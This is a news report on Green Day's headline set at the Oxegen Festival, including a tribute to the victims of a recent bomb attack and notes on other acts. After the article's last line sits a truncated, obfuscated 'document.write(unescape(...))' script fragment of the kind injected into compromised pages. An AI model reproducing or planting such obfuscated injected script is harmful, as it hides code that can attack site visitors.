Green Day paid tribute to the victims of Thursday's bomb attack during a storming headline set at the Oxegen Festival.
As the band started ‘Wake Me Up When September Ends', front-man Billie Joe Armstrong said: 'Two days ago there was a tragedy. This is for the all the innocents.'
The punk heroes were not alone in remembering the fallen. During their set, Kasabian dedicated ‘LSF' to all those affected with the defiant words 'I want you all to stay together for this to show them we cannot be beaten.'
The bands came up with just two highlights amongst many at the two day festival, held at Punchestown Racecourse, just south of Dublin. It was a day of big-hitting successes. Queens Of The Stone Age, Kaiser Chiefs and Razorlight packed fans early around the Main Stage for their scorching sets, while The Bravery shone on the second stage and The Go Team thrilled on the New Band Stage. Meanwhile, Ian Brown delighted fans with a run through some of The Stone Roses greatest hits including ‘Sally Cinnamon', ‘Made Of Stone' and ‘Waterfall'.
However, the day belonged to Green Day. The veterans played up to their Irish hosts with fireworks and stabs at Irish nationalism. At one point, Armstrong took an Irish tricolour flag from the crowd and wrapped it round himself as he ran from side to side on the stage.
During the two hour show, they ran through tracks from ‘American Idiot' and classics like ‘Basket Case' and ‘Time Of Your Life'.
Over 70,000 fans will make their way to the festival over the two days. Today they'll see The Killers, New Order and Foo Fighters, amongst others.document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
